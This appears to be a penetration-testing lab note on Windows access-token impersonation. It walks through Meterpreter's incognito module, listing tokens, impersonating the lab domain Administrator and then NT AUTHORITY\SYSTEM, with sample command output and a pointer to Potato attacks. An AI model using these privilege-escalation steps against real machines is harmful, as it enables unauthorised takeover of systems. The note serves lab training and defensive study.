Access Token

Get a meterpreter session on the target and follow the below techinique:-

getprivs
    SeAssignPrimaryTokenPrivilege
    SeAuditPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeImpersonatePrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeSystemtimePrivilege
    SeTimeZonePrivilege
    

NOTE:- You need ImpersonatePrivilege to carry out this technique

#Access Token Impersonation

load incognito
# if the session dies, run the exploit again
list_tokens -u

    Delegation Tokens Available # Interactive Logon
    ========================================
    ATTACKDEFENSE\Administrator
    NT AUTHORITY\LOCAL SERVICE

    Impersonation Tokens Available # Non-Interactive Logon
    ========================================
    No tokens available
  • ATTACKDEFENSE\Administrator account access token would provide elevated privileges

impersonate_token "ATTACKDEFENSE\Administrator"

getuid
	Server username: ATTACKDEFENSE\Administrator
getprivs
	[-] stdapi_sys_config_getprivs: Operation failed: Access is denied.
pgrep explorer
migrate 3640

getprivs
  • Listing tokens with this account, there can be additional available tokens

list_tokens -u

    Delegation Tokens Available
    ========================================
    ATTACKDEFENSE\Administrator
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\SYSTEM
    Window Manager\DWM-1

    Impersonation Tokens Available
    ========================================
    Font Driver Host\UMFD-0
    Font Driver Host\UMFD-1
    NT AUTHORITY\NETWORK SERVICE
  • NT AUTHORITY\SYSTEM can be impersonated, getting the privileges associated with its access token

impersonate_token "NT AUTHORITY\SYSTEM"
  • In the case of no Delegation or Impersonation tokens found, the Potato Attack can be used to get or generate a NT AUTHORITY/SYSTEM access token, impersonating it and obtain privileges associated to it.

Last updated